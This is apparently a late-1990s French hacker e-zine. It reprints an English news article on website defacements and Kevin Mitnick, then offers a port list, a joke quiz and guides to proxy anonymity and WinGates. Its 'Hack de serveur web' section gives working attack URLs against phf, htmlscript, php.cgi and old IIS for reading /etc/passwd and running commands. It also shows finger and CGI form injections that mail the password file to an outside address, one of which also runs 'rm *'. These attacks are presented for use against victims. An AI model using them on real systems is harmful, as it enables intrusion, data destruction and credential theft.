Their loose-knit groups bear names like the ``Keebler Elves,'' the ``Masters of Downloading'' and ``Hacking for Girlies.''
When they hack sites, they traditionally leave behind inane scrawlings - ``Boo! Did we scare you?'' - and ``shout-outs'' to their friends.
Those familiar with the hacking subculture say such groups are generally composed of teens - and occasionally people in their early 20s - with a lot of computer equipment and too much time on their hands.
``These are just immature kids doing this from their home computers,'' said John Vranesevich, founder of Anti-Online, a group that tracks hacker activity and that has compiled dossiers on 6,000 hackers. ``It's a game to them. They make a move, and they can't contemplate how it affects people in the real world. It's not reality until the FBI bangs on their door.''
Vranesevich called the recent wave of attacks a ``temper tantrum'' over the May FBI raids, in which agents confiscated computer equipment and questioned teens in 11 cities, including Houston, Seattle and San Diego. A spokeswoman for the FBI in Boston said the New England office was not involved in the operation.
Those who deface Web sites - about 1,300 sites have been defaced so far this year, according to the most reliable statistics - justify their actions by arguing they're actually doing companies and organizations a service by pointing out security deficiencies.
But law enforcement authorities and others who deal with hackers dismiss the argument.
``I don't buy it,'' said Drew Williams, the founder of an AXENT Technologies' SWAT team to deal with hacker attacks. ``Any hacker group that has not been invited to test security is committing a crime.''
That assessment is shared by David Green, deputy chief of the computer crimes and intellectual property section at the Justice Department.
``This is not just electronic graffiti,'' Green said. ``They're shutting down access to Web sites, sometimes for hours, sometimes for days, and it makes it impossible for people who want access to that Web source to get it.''
Moreover, there's far more at risk than down time for Web servers, contends Peter Mell, who conducts hacker research for the National Institute of Standards and Technology, a division of the U.S. Commerce Department.
``Real harm can be done,'' Mell said. ``A lot of people download their tax forms from the IRS today. What if someone broke into the IRS Web server and changed just a single number? It would cause supreme chaos.''
Mell also pointed to electronic banking and stock trading, saying Web servers today handle increasing amounts of sensitive information.
``This isn't child's play anymore,'' he said. ``I pay my bills online. I trade stocks online. In that kind of environment, I can't afford people breaking into computers.'' [Nd MadDany : ben qu'est-ce tu veux y en aura toujours des plus forts que toi]
The FBI heartily agrees, though it has not characterized its crackdown on hackers in quite the grandiose terms that hackers do.
``We don't have a war against hackers. We're following our mandate, which is to investigate violations of federal law,'' said Bill Carter, a spokesman for the FBI's headquarters in Washington. ``The fact that these hackers or hacker groups have their noses out of joint over this, we can't help that.''
Most hackers are not caught, but the recent raids suggest the FBI is starting to get better at tracking them. The agency has about 500 open computer crimes cases at any given time.
But the federal agents' methods - charging in with warrants and bulletproof vests - worries some in the hacking community.
``For those of us in the scene for a number of years, it's starting to get scary only because we worry it's going to turn into a witch hunt,'' said Space Rogue, a member of the Boston-area group L0pht Heavy Industries, a former hacker clan that now bills itself as an electronic think tank.
``While defacements will probably continue no matter what law enforcement officials do, it would be very easy for the government to just start executing search warrants left and right, seizing computers and scaring people half to death.''
Internet watchdogs - and some hackers themselves - say that while the crackdown should continue, the real issue is computer security.
Space Rogue argues that nearly all Web page defacements are carried out with known security flaws in software. As an example, he said, his group e-mailed the Army's webmaster about a flaw in its ColdFusion server software a month before someone used the hole to hack into the Army's Web site.
``It comes down to the person in charge of the machine and whether they're taking their security seriously,'' Space Rogue said. ``This sort of thing never should have happened in the first place.''
Settle, the former FBI computer crimes chief, says the danger will be far greater when those doing the hacking aren't teens out for kicks but terrorists intent on electronic warfare.
``Our computer systems today are like cars operating without safety equipment: no headlights, no bumpers, no airbags, no roofs,'' he said. ``Heck, if teenagers can do this, what can sophisticated intelligence operatives do? This is just a taste of things to come.''
The government acknowledges as much.
In testimony before a congressional panel, government security experts said government computers are easy marks because employees lack training, because well-trained staff flee for the bigger paycheck of the private sector and because internal security procedures often aren't followed.
``Most federal agencies continue to lack the ability to detect against and recover from cyber attacks,'' U.S. Rep. Connie Morella (R-Md.), chair of the House Science Subcommittee on Technology, said at the June 23 hearing.
To combat the deficiency, the Clinton administration last week proposed spending $1.5 billion in the next fiscal year on a sophisticated intruder warning system that would be installed on military, government and private-sector computer networks by 2003. [Nd MadDany : il bluffe il le fera pas... enfin on a plus qu'à espérer...]
Operating something like a burglar alarm, the system would detect break-ins, funneling that information to a central location.
``A concerted attack on the computers of any one of our key economic sectors or governmental agencies could have catastrophic effects,'' Clinton wrote in a draft cover letter accompanying the proposal.
Civil libertarians and Internet privacy watchdogs already have protested the plan, saying it will give the government unprecedented surveillance powers, equipping authorities with the tools to peruse the private dispatches of the masses.
House Majority Leader Dick Armey (R-Texas) joined in the criticism, deriding the plan as an opportunity for ``government peeping toms.''
No matter the government response, hackers will, no doubt, continue mounting challenges, probing for deficiencies in networks and deriding those who chase them.
``You can stop one, but you can not stop all,'' hackers wrote when they defaced the U.S. Senate Web page for the second time in late June.
A more recent defacement of an obscure Venezuelan Web page repeated the theme, carrying a ``call to arms'' imploring competing hacker groups to unite to ``win this war.''
``Remember, this is our world, not the government's,'' the page read.
Time will tell.
Prosecuted `cracker' a martyr to techies
In hacker circles, he is a modern-day martyr, a technological tinkerer whose attacks on other people's computers amounted to harmless exploration before the FBI swooped down on him, dubbing him Online Enemy No. 1.
To prosecutors and to judges, he is a dangerous miscreant whose ability to crack computer systems and whose propensity for running from the law required that he be held without bail.
Kevin Mitnick, for four years the cause celebre of the Internet's dark side, could soon be going free.
Mitnick, 35, who pleaded guilty in March to multiple counts of computer and wire fraud for breaking into systems and stealing software from such companies as Sun Microsystems [Nd MadDany : les développeurs du langage Java], Novell, Motorola and Nokia, will be sentenced Aug. 9 under a plea agreement that could, with good behavior credits, allow him to leave federal prison within weeks.
``Kevin is optimistic that this case will be over and that he can get on with his life,'' said Mitnick's lawyer, Donald C. Randolph of Santa Monica, Calif.
But even if Mitnick himself fades into obscurity, his cause is unlikely to follow. In the hacking community, Mitnick long ago became a symbol of what hackers term gross government over-reaction, a theme repeatedly hammered home by Randolph.
``The government prosecution of Mr. Mitnick was to carry out an agenda launched by them in the 1990s,'' Randolph said.
``The government wanted to demonstrate they were going to be tough on computer terrorism. Unfortunately, the government did not have a bonafide computer terrorist to prosecute, so they went after Mr. Mitnick, a recreational hacker who was arrested with a big splash and who became a convenient target.''
Randolph's comments could be dismissed as the arguments of a defense lawyer looking to gain sympathy for his client, but he's not the only one making them.
Drew Williams, who founded Axent Technologies' SWAT team to respond to hacking incidents for clients, said the government miscalculated with Mitnick.
``I am not a Mitnick supporter at all. However, I think the government did in fact set out to make an example and instead made a martyr,'' Williams said. ``An individual's rights to due process probably got a little trampled.''
Denied bail on charges that could have initially landed him in jail for a century, Mitnick appealed all the way to the U.S. Supreme Court, where the justices declined to hear his lawyer's argument that bail should be set.
Hackers have seized on the bail issue, leaving ``Free Kevin'' messages on the Web sites they hack. Recent examples include the home pages of the U.S. Senate and Greenpeace, where hackers left the tongue-in-cheek message ``Free Mitnick or we will club 600 baby seals.''
There is also a ``Free Kevin'' Web site (www.freekevin.com) that gives Mitnick updates and carries a confinement clock showing - to the second - how long Mitnick has been jailed.
Randolph argues that while people should be prosecuted for breaking into systems, the law needs to be refined to distinguish between recreational hackers and information terrorists.
``I do not quarrel at all with the government's right to prosecute computer fraud and to go after computer terrorists, but it's high time they distinguish between high crimes and misdemeanors so they're not trumpeting the arrest of the century when the suspect is a kid on a laptop,'' Randolph said.
Mitnick's prosecutors insist they have not overreached, that Mitnick caused millions in damage by stealing and changing information in computer systems.
``This is someone whose conduct over a 2-year period was very broad and very serious,'' Assistant U.S. Attorney Christopher Painter said. ``He hit a huge number of companies with a lot of damage. He is not the victim.''
If Mitnick does win his freedom soon, it could be short-lived. The Los Angeles County District Attorney's Office is preparing its own case against him on charges similar to the federal claim.
Randolph said he's confident Mitnick, in the end, will prevail.
``In 1995, the press and the public were fooled into thinking Kevin Mitnick was this cyber bogeyman,'' he said. ``That type of argument doesn't fly in 1999. People know better.''
Sites that have been targeted
Here's a partial list of Web sites that have been attacked in recent months. In most cases, the sites were defaced. In others, a flood of requests for service overwhelmed Web servers, rendering them unusable. In several of the attacks, the intruders called the acts revenge for FBI ``harassment'' of hackers.
Bell South
eBay (on-line auctioneer)
FBI
Fort Monmouth (N.J.) U.S. Army Garrison
Georgetown University
Harvard University
Idaho National Engineering and Environmental Laboratory (conducts research for the U.S. Department of Energy)
Illinois Comptroller's Office
NASA Goddard Space Flight Center
National Oceanic and Atmospheric Administration Storm Prediction Center
State of Virginia home page
University of California-Davis
University of Colorado
University of Michigan
University of Wisconsin
U.S. Army main Web site
U.S. Coast Guard
U.S. Department of Agriculture
U.S. Department of Education
U.S. Department of the Interior
U.S. Department of Labor
U.S. Information Agency
U.S. Navy
U.S. Senate (twice)
The White House
-----------------------------------------------------------------

Voilà...On comprend mieux après ca pourquoi ca fout les boules
aux entreprises et aux gouvernements...
(Je l'ai pas traduit...désolé, pas le temps mais si quelqu'un veux
me le traduire, j'attends...)
[Nd MadDany : t'es pas fou t'as vu la taille ? :o)]

========================================================================
LISTE DES PORTS Par MADDANNY !!!
========================================================================
Connecting...
Time out, retrying...
Connected

--->>> Les ports tcp les plus connus, by MadDany <<<---

Loading....
Type your commands here : list
Command OK
Loading list...

Port Service
7 echo
9 discard
11 systat
13 daytime
15 netstat
17 qotd
19 chargen
20 ftp-data
21 ftp
23 telnet
25 smtp
37 time
42 name
43 whois
53 nameserver
57 apts
59 apfs
77 rje
79 finger
80 http
87 link
95 supdup
100 newacct [usage interdit]
101 hostnames
102 iso-tsap
103 x400
104 x400-snd
105 csnet-ns
109 pop2
110 pop3
111 sunrpc
113 auth
115 sftp
117 uucp-path
119 nntp
123 ntp
133 statsrv
136 profile
144 news
170 print-srv
443 https
512 exec
513 login
514 cmd
515 printer
520 efs
526 tempo
530 courier
531 conference
532 netnews
540 uucp
543 klogin
544 kshell
555 dfs
556 remotefs
562 chshell
570 meter
600 pcserver
607 nqs
666 mdqs
750 rfile
751 pump
752 qrh
753 rrh
754 tell
758 nlogin
759 con
760 ns
761 rxe
762 quotad
763 clycleserv
764 omserv
765 webster
767 phonebook
769 vid
771 rtip
772 cycleserv2
773 submit
774 rpasswd
775 entomb
776 wpages
780 wpgs
800 mdbs
801 device
997 maitrd
998 busboy
999 garcon
1025 blackjack
1347 bbn-mmc
1348 bbn-mmx
1524 ingreslock
1525 orasrv
1600 issd
1650 nkd
2001 dc
2004 mailbox
2005 berknet
2006 invokator
2007 dectalk
2008 conf
2009 news
2010 search
2011 raid-cc
2012 tty-info
2013 raid-am
2014 troff
2015 cypress
2017 cypress-stat
2018 terminaldb
2019 whosockami
2021 servexec
2022 down
2025 ellpack
2027 shadowserver
2028 submitserver
2030 device2
2032 blackboard
2033 glogger
2034 scoremgr
2035 imsldoc
2038 objectmanager
2040 lam
2041 interbase
2042 isis
2044 rimsl
2047 dls
2048 dls-monitor
2049 shilp
3049 nsws
4672 rfa
5000 complexmain
5001 complexlink
5236 padl2sim
6666 complete-write/read-access
9535 man

List loaded
Type your commands here : open port 6666
Command OK
Are you sure ? This will give you complete access to the server y/n : y
Command OK
Fuck you lamer, disconnecting...
Disconnected



[note de MadDany : c'est une blague le port 6666, essayez pas de vous y connecter
comme un gros lame pendant des heures, pas comme le débile du texte...]

========================================================================
HACK DE SERVEUR WEB avec votre BROWSER
========================================================================

Hacker un serveur, mais pourquoi faire ?
Hacker un serveur est pour The Underground Angels l'occupation principale
afin de faire passer nos idées...
C'est donc très utile mais pour cela, il faut les passwords...
Rien de plus simple avec ces quelques bugs de récupérer les fichier passwd
et shadow généralement ds le répertoire /etc/
Il suffit ensuite de faire marcher son pc avec un crackeur comme John The Ripper.

Voici la liste:

HTTP - htmlscript
SERVICE: http

BUG: Htmlscript (www.htmlscript.com) vous autorise l'acces aux fichiers systemes du serveur.

IMPACT: Les utilisateurs sans droits peuvent via leur navigateur lire n'importe quel fichier systeme du serveur.

EXEMPLE:
Il suffit de taper:
http://www.victime.com/cgi-bin/htmlscript?../../../../../etc/passwd
Le nombre de repertoires est lie bien sur a l'emplacement du fichier "
passwd" ou du
fichier que vous voulez lire et aussi de l'emplacement du repertoire "
CGI-BIN".



HTTP - phf

SERVICE: http

BUG: Le script phf distribue avec le serveur http NCSA, version NCSA/1.5a et anterieures ainsi que le serveur Apache anterieure a la version 1.0.5 ne filtrent pas certaines requêtes

IMPACT: Via le WEB les utilisateurs peuvent executer certaines commandes par l'intermediaire du daemon http

HISTORIQUE: Le bug a ete decouvert le 12 mars 1996 Une liste de serveurs est disponible par l'intermediaire de commandes speciales de ALTA VISTA

EXEMPLE:
http://victime.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
Cet exemple vous permet de recuperer le fichier /etc/passwd a partir d'un serveur
vulnerable.




HTTP - php.cgi
SERVICE: http

BUG: Voici un bug identique a celui de phf decrit ci dessus

EXEMPLE:
http://victime.com/cgi-bin/php.cgi?/etc/passwd
Vous permet de recuperer comme le phf le fichier /etc/passwd




HTTP - Microsoft IIS/1.0 pre service pack 3
SERVICE: http

PROGRAMME: Microsoft internet-Server/1.0 anterieure au pack 3

BUG: Le serveur autorise certaines commandes en dehors du chemin initial

IMPACT: Les utilisateurs peuvent prendre le control du serveur :)

DESCRIPTION:
Il est possible de recuperer des fichiers et d'executer des commandes en dehors
du chemin "
www" en ajoutant ".." dans le chemin d'acces.
Dans les exemples suivants le chemin d'acces envisage de IIS est c:\inetsrv et
pour Windows NT c:\winn35
http://your.host.name/scripts/anyold.cmd?&dir+c:\
http://your.host.name/scripts/anyold.bat?&dir+c:\
http://your.host.name/..\..\autoexec.bat
http://your.host.name/scripts/../../../winnt35/win.ini
http://your.host.name/scripts/..\..\winnt35\cmd.exe?%2FC+set
http://your.host.name/scripts/..\..\winnt35\cmd.exe?%2FC+echo+"
Hi
There"+>c:\temp\hello.txt
http://your.host.name/scripts/..\..\WINNT35\SYSTEM32\XCOPY.EXE?+c:\autoexec.bat+c:\temp



Vous en voulez encore ??

En voici:

FINGER BOX

C'est pour avoir accès au finger d'un site comme hummm, AOL par exemple...
Il suffit de taper l'adresse comme http://www.aol.com et de rajouter:
/cgi-bin/finger à la fin.
Ce qui donne:
Http://www.aol.com/cgi-bin/finger

Voilà, si ca marche, vous devez voir apparaitre une boite de dialogue vous demandant le nom
que vous voulez finger. Vous aurez probablement le fichier /etc/passwd dans la foulée...
Ensuite, cherchez dans la page les tags 'mailto' (pour les adresses), retournez dans la boite Finger et tapez: nobody@nowhere.org ; /bin/mail moi@hackeur.org < etc/passwd
{Le Neuneu} {rep. Mail} {mon adresse} {fichier passwd}

Vous devriez alors recevoir le fichier passwd dans votre boite...

CGI

Cette partie vous expliquera comment recevoir le fichier /etc/passwd à partir du
formaulaire Cgi de quelqu'un.
Regardez d'abord le source du fichier:
<html><body>
<h2>This is a form to go to Modify</h2>
<form action = "
http://www.aol.com/cgi-bin/doc.pl" method="get">
<input type="
hidden" name="myaddress" value="nobody@aol.com">
<input type="
text" name="input">
<input type="
submit" value="send">
</form>
</body></html>

C'est un simple formulaire qui demande à l'utilisateur de rentrer un message
qui sera envoyé à un script appelé 'doc.pl'
Dans ce script, il y a une ligne qui peut tout changer !!! hahaah
c'est:
system("
/usr/lib/sendmail -t $myaddress < $tempfile")

A vous de vous en servir.

Faites votre propre fichier HTML contenant:
<html><body>
<h2>Hack AOL</h2>
<form action = "
http://www.aol.com/cgi-bin/doc.pl" method = "get">
<input type="
hidden" name="myaddress"
value="
; rm * ;mail -s file tonaddresse@tua.com < /etc/passwd;">
<input type = "
text" name="input">
<input type = "
submit" value=:"getpasswd">
</form></html>

Voilà, vous aurez encore le fichier passwd avec cette technique...

MODIFIER UN FICHIER HTML

Envie de rajouter une image, du texte etc...dans un fichier html ?
Rien de plus simple:
tapez apres une adresse comme AOL (http://www.aol.com/)
la ligne suivante:

cgi-bin/phf?Qalias=x%0a/bin/echo%20 "
Tout ce que vous voulez dire..."%20>>filename.html

Attention de bien employer le language html pour modifier tout ca....


Voilà !
Certains bugs ont été corrigés dans les nouvelles versions de ces logiciels...
Mais bon, il doit en rester quelques uns qui continuent d'utiliser ces logiciels...
Mais sinon, dans, les nouvelles versions qui sortent, il doit sûrement avoir des bugs
(Surtout chez Kro...)...Envoyez moi vos listes de bugs...

White Angel



========================================================================
---///> Da UltImAtE HaCker'Z TeSt, by MadDany <\\\---
========================================================================

Bon, on va voir si vous êtes un vrai hacker... cette fois vous pourrez pas vous échapper...
Ready ? Go !
[Nd de WA: Repondez par oui ou par non]

001 Avez vous déjà raté un rendez-vous parce que vous étiez devant votre ordinateur ?
002 ... raté un mariage ?
003 ... raté votre propre mariage ?

004 Avez vous déjà essayé de changer la valeur de 4 ?
005 ... avez vous réussi ?

006 Est-ce que vous savez depuis combien de jours vous êtes né ?

007 Est-ce que vous avez déjà essayé de télécharger une pizza ?

008 Pouvez vous écrire avec les valeurs ASCII ?

009 Est-ce que vous pouvez nommer les puissances de 2 supérieures à 2!32 ?

010 Est-ce que vous entendez votre ordinateur vous parler ?
011 ... est-ce que vous avez déjà agressé un de vos amis avec un marteau parce que votre ordinateur vous a dit de le faire ?

012 Est-ce que vous arrivez à reproduire les bruits d'un modem ?
013 ... supérieur à 28 Kbps ?

014 Est-ce que vous avez déjà essayé de parler à votre modem ?
015 ... est-ce qu'il a répondu ?

016 Est-ce que vous enregistrez les bruits de votre imprimante et appelez ça du Techno Industrial Modern Jazz ?

017 Pouvez-vous convertir de l'hexa en octal dans votre tête ?

018 Avez vous regardé votre ordinateur d'un oeil bizarre quand vous avez appris qu'il contenait des cookies ?
019 ... avez vous déjà essayé de le démonter rien que pour vérifier que c'était vrai ?
020 ... avez vous poussé un soupir de soulagement en vous rendant compte que c'étaient des bobards destinés à vous mystifier ?

021 Est-ce que vous avez plus d'un ordinateur ?
022 ... 4 ordinateurs ?
023 ... 16 ordinateurs ?

024 Avez vous un disque dur de plus de 16 mégaoctets ?
025 ... 256 Mo ?
026 ... 1 gigaoctets ?
027 ... 16 Go ?
028 ... 256 Go ?
029 ... 1 teraoctets ?

030 Est-ce que vous avez une bibliothèque

  
?
031 ... avez vous remplacé tous les livres par des disquettes ?

032 Avez vous déjà refusé une promotion parce que votre nouvel ordinateur de bureau était moins puissant ?

033 Est-ce que vous récitez les ports de communication dans l'ordre pendant votre sommeil ?

034 Est-ce que vous connaissez plus d'un langage de programmation ?
035 ... plus de 4 ?
036 ... plus de 16 ?
037 ... plus de 32 ?
038 ... est-ce que vous rêvez dans un de ces langages ?

039 Est-ce que vous avez déjà créé un langage de programmation ?

040 Avez vous déjà crashé un système ?
041 ... était-ce fait exprès ?

042 Est-ce que vous connaissez des vrais gens qui arrivent à parler sans clavier ?
043 ... plus d'une personne ?
044 ... plus de 2 personnes ???

045 Est-ce que vous avez fait vos lacets ?

046 Est-ce que vous arrivez à communiquer normalement avec des étrangers ?

047 Est-ce que vous voyez les objets tridimensionnels en mode fil de fer ?
048 ... est-ce que vous trouvez ça normal ?

049 Est-ce que vous décorez votre frigo avec des disquettes ?

050 Avez-vous déjà demandé à votre mèdecin de vous faire un scandisk ?
051 ... est-ce qu'il vous a envoyé à la place chez des gens habillés en blanc qui vous ont prêté une jolie chemise et fait des piqûres ?

052 Avez vous déjà écrit un programme quelconque ?
053 ... un compilateur ?
054 ... un virus ?
055 ... un prophylactique ?

056 Avez-vous déà écrit un programme qui s'est exécuté correctement du premier coup ?
057 ... est-ce que le code faisait plus de 20 lignes ?
058 ... plus de 100 lignes ?
059 ... est-ce que vous pouvez le réciter à l'envers ?

060 Avez vous déjà calculé un nombre premier de plus de 100 chiffres ?

061 Est-ce que vous pouvez réciter toutes les couleurs des boxes et leurs fonctions ?
062 ... est-ce que votre téléphone ressemble encore à quelque chose ?

063 Avez-vous déjà passé plus de dix minutes à chercher une erreur de frappe dans un fichier source ?
064 ... plus d'une heure ?
065 ... plus d'un jour ?
066 ... plus d'une semaine ?
067 ... est-ce que la première personne a qui vous avez montré la source a trouvé l'erreur sur le champ ?
068 ... est-ce que vous avez assommé cette personne avec votre clavier et caché le corps derrière le meuble ?



Voilà, je crois qu'avec ça vous pourrez évaluer votre niveau assez fidèlement.... ;^)
[Pour ce texte je me suis pas mal inspiré d'un exte anglais, et pis j'ai rajouté mes blagues. MadDany]



========================================================================
Rester ANONYME sur le Web
========================================================================

Les sujets sont:
1.Que sont les 'packets'
2.Obtenir un proxy http
3.Comment fonctionne un proxy http
4.Comment sécuriser les 'packets' http
5.Comment éditer les infos que votre OS et votre browser envoie
6.Obtenir un proxy (socket proxy) fonctionnant sur le socket
7.Comment fonctionne un 'socket proxy'
8.Cookies
9.Conclusion


-------------------------------------------------------------------------
1. Que sont les packets

Les packets sont utilisés par tous les internautes...C'est vraiment la
notion basique à connaitre...
Les Packets peuvent être assimilé à des messages mis en capsules que le
serveur et le client s'échangent pour se reconnaitre.
Lorsque vous vous connectez à une machine distante, les packets
servent à identifier qui est connecté...

Voici un exemple de packet:
[Connect from undergroundangel.cjb.net]
[208.11.17.52] (Mozilla/4.05 [en] (X11;I;Linux 2.0.34 i586) on August
15, 1999 at 14:34:45

Maintenant, je vais vous expliquer ce que ça signifie si vous ne savez pas.
*Note*: Les packets http sont ce que vous utilisez pour envoyer des infos
avec votre browser vers un serveur/Machine/site.

[connected from undergroundangel.cjb.net]-C'est l'Hote
[208.11.17.52]- C'est l'IP
(Mozilla/4.05)- C'est la version de Mozilla utilisée (Netscape)
(X11;I;Linux 2.0.32 i586)- C'est mon OS et sa version [Nd MadDany : baaaah du Linux]
[On August 15, 1999 at 14:34:45] - C'est le jour/année/heure


C'est utilisé tout à fait légalement par des serveur pour savoir qui vous
êtes mais aussi par des Hackers pour mieux vous connaitre..hahaha
Il faut savoir que les proxys ont été inventés pour donner une
sécurité à l'utilisateur et empecher de connaitre ces informations...
Mais utiliser des proxys anonymes n'est pas à 100% fiable, un bon hacker
peut quand même avoir votre hote/ip..etc mais ca sera plus dur pour lui...
Maintenant, les packet http ne sont pas les seuls, il existe des sockets packets
(Packet de connexion) Mais nous verrons cela + tard...


2.Comment fonctionne un proxy http

Un proxy http fonctionne comme un serveur. vous configurez votre browser
pour qu'il se connecte au proxy lorsque vous voulez voir un site.
Votre browser se connectera donc d'abord au proxy et le proxy se connectera
au site que vous voulez voir...Vous aurez ainsi le site voulu et le serveur
ne verra que l'IP du proxy.

Moi et mon Ordinateur (je tape: http://www.le_site.com/)
|
|
|
\|/
Mon Browser internet se connecte tout seul au proxy
|
|
|
\|/
Le proxy va sur http://www.le_site.com
|
|
|
\|/
Le Site.com ne vois que les packets du proxy et pas les votres

Ensuite le proxy vous renvois les pages....
Si le proxy ne fonctionne pas, c'est qu'il n'est plus valable ou mal configuré...
Nous verrons comment configurer un proxy plus tard...

[Nd MadDany : je me permets de préciser quelques trucs. Les serveurs proxys sont utilisés dans des grandes entreprises disposant d'un réseau local (LAN) qui veulent mettre leurs ordinateurs sur le réseau Internet. Pour des raisons de sécurité évidentes ils ne peuvent pas se permettre de fournir une connexion individuelle à chaque machine, ils vont donc connecter les ordinateurs à un serveur proxy qui va faire le lien entre le réseau local et le réseau distant. Ainsi quelle que soit la machine connectée sur un serveur, ce dernier verra le proxy. En pratique lorsque vous vous connectez sur le proxy vous lui donnez des ordres qu'il transmet au serveur sur lequel vous vous connectez, et ensuite le serveur renvoie les informations au proxy, qui vous les transmet à nouveau. Le serveur n'a donc (en théorie) pas connaissance de vos informations personnelles. De plus la connexion est considérablement ralentie par tous ces processus supplémantaires, étant donné qu'à aucun moment vous ne créez de connexion TCP (directe) sur le serveur. Voilà]
[Nd WA: Merci Mad]

3.Obtenir un proxy Http
Les proxys http sont très simple à trouver sur le net et sont libres à utiliser...
Il faut juste bien choisir son proxy, dans sa région de préférence pour que la connexion
soit plus rapide...

Je vous aurais bien donné une liste de proxys mais je ne sais pas s'ils fonctionnent
et si ils seront valables longtemps...
Allez voir http://www.proxy4all.com
[Nd MadDany : ou demandez moi]

4. Comment sécuriser les packets http

Comme je l'ai dis avant, ceci est un packet classique:
[Connect from undergroundangel.cjb.net]
[208.11.17.52] (Mozilla/4.05 [en] (X11;I;Linux 2.0.34 i586) on August
15, 1999 at 14:34:45

Maintenant, pour rendre votre ip et votre nom d'hote anonyme, nous allons utiliser
un proxy avec votre browser internet.
Allez dans les options ---> dans la configuration du proxy et rentrez toutes les
infos necessaires à se configuration du proxy: ftp, http, port...etc
Maintenant, vos packets ressembleront a ça:
[Connect from The_proxies_host]
[The_proxies_ip] (Mozilla/4.05 [en] (X11;I;Linux 2.0.34 i586) on august
15, 1999 at 14:34:45 )

Vous remarquerez que le serveur connait votre OS.
Je vous expliquerai plus tard comment remédier à ça...
Maintenant, vous pensez être totalement anonyme ...
Mais non, car si un hacker hack le serveur proxy et compare les logs
avec votre heure de connexion, il retrouvera votre IP/Hote.
Mais c'est quand même un gros boulot de comparer les logs...

[Nd MadDany : certains proxys ne loggent pas les personnes qui se connectent sur eux, comme pour les WINGates (voir plus loin)]

5.Comment éditer les infos que votre Browser et votre OS envoie.

Vous pouvez modifier les nom de vos versions de Win etc..dans:

GOTO HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
ProductName = Microsoft Windows 95
Version = Windows 95


GOTO HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\Post Platform
(Vos Parametres originaux sont là) = IEAK(Tes parametres originaux)

Exemple

GOTO HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\Post Platform
Cool [Unix-Base] = IEAKCool [Unix-Base]

*Note (Je n'ai rien testé alors, je ne sais pas si ca marche...)

[Nd MadDany : pour ceux qui connaissent pas l'éditeur du registre, il faut taper "regedit" dans la commande exécuter du menu démarrer de Windows. Ensuite vous cherchez l'arborescence spécifiée et vous double cliquez sur l'élément qui nous intéresse, et enfin vous modifiez sa valeur dans la case de texte qui apparait. Ouf !]

[Nd WA: On sait jamais, avec ceux qui utilisent nunuX...]

6.Obtenir un socket proxy

Les sockets proxys fonctionnent comme les proxys http à la seule différence
qu'ils sont utilisé avec des programmes comme Icq ou Mirc et les packets
sont envoyés a travers les sockets et non pas les http. (Vous me suivez toujours ?)
Trouver un socket proxy est plus dur car il est dédié à un programme bien spécifique
et il est limité aux personnes qui l'utilisent.
Http est déjà utilisé pour toutes sortes d'emplois. Nous auront donc toujours besoin
de serveur proxy.
POUR trouver un socket proxy vous pouvez chercher sur le net (socket proxy)
ou essayer certains noms de programmes comme Icq proxy.
Si tout vas bien, vous aurez un socket proxy qui sera utile pour vous protéger
des lames qui jouent avec des nukers..etc.
Et vous ne serez ennuyé comme un utilisateur de mirc ou icq à qui ont peut voir
l'IP et le nom d'Hote
Vous me direz...A quoi ca sert de faire ca alors qu'on peut spoofer..
Et là, je vous réponds: "Le Spoof, c'est pas stable, tandis que les proxys
sont stables..."
Il existe beaucoup de sockets proxy...A vous de les trouver en cherchant
sur le net..


7.Comment fonctionne un Socket Proxy.
Quand vous recevez ou envoyez un fichier pour le serveur ou l'utilisateur à
travers le socket, il se passe ceci:
( established a connection on undergroundangel.cjb.net port 1030 )
Et il n'y a pas de log sur l'ordinateur avec l'heure et la date...
C'est pkoi vous avez besoin d'un socket proxy car les hacker peuvent savoir
ce que vous faites...
[Nd MadDany : moi qui croyait que c'était nous les hackers...]
[Nd WA: Oui mais y'en a qui se familiarise avec le milieu du hacking pour mieux se protéger]

8.Cookies

Ok, les cookies une autre manière d'envoyer des infos du serveur/isp
vers votre ordinateur. Les cookies contiennent des infos sur les pages
web que vous avez visité, sur ce que vous avez chargé et votre IP/hote
et date et heure.
Les hackers peuvent utiliser ça pour 2 raisons:
1. Obtenir les infos necessaire pour vous hacker
2. Etre capable de savoir tout ce que vous avez fait sans que vous le
sachiez.
Avec votre Browser, vous pouvez stopper les cookies. Allez ds les options.

[Nd MadDany : avec IE 5.0, faites Outils/Options Internet.../Onglet Sécurité/Personnaliser le niveau. Là vous pourrez contrôler les niveaux de sécurité des contrôles ActiveX, Java, les cookies... Pour effacer ceux qui sont déjà contenus dans votre ordi allez faire un tour dans c:/Windows/Temporary Internet Files et c:/Windows/Cookies. Je vous conseille aussi de paramétrer Internet Explorer pour ne pas conserver l'historique des sites que vous visitez (dans le même menu que tout à l'heure). Les temporary internet files sont très intéressants lorsqu'on veut savoir quels sites vous visitez (on retrouve les bannières, les photos plus ou moins évocatrices...), alors dans les options internet, cliquez sur l'onglet Avancées et cochez la case tout en bas (vider le dossier temporary internet files dès que vous fermez le browser)]

Now With all browsers now u can stop even limit cookies from the oriene
of your server.Go to your options u will find something on cookies
there in ya browser.
Now this is very limiting so if ya a linux/unix user there is a nice
little program i know that will go that few steps furture.
Visit. (http://www.lne.com/ericm/cookie_jar/)
THis program called "Cookie jar" alows u to limit sites from your computer
limit if u get cookies from that site/server its goes the extra steps
u need.

9.Conclusion

Bon, voilà... C'est un document en anglais que j'ai traduit...
Y'a des lacunes et quelques erreurs mais bon...Ca a surement
éclaircit les newbies dans le domaine des proxys...


White Angel


========================================================================
---///> No mORe Mot A fUcKiN' BlooD SuCkEr WorMs <\\\---
========================================================================

Je vous avais dit que mes titres avaient rien à voir. Donc, comme son titre ne l'indique toujours pas, ce texte va vous apprendre à peu près tout ce que je sais sur les WinGates. WinGate est un programme qui splitte les connexions, ainsi ceux qui ont le câble l'utilisent souvent comme ça ils peuvent partager la connexion par le câble avec tous les ordinateurs de leur maison. Autrement dit, plusieurs ordinateurs peuvent se connecter sur le WinGate et ainsi se trimbaler sur les réseaux avec la même identité. Là où ça devient intéressant pour nous c'est lorsqu'on trouve un serveur équipé de WinGate, sur lequel on va se connecter et naviguer à partir de là. Lorsqu'on va chercher à avoir des infos sur nous on trouvera celles du WinGate. Spoofing rulez !

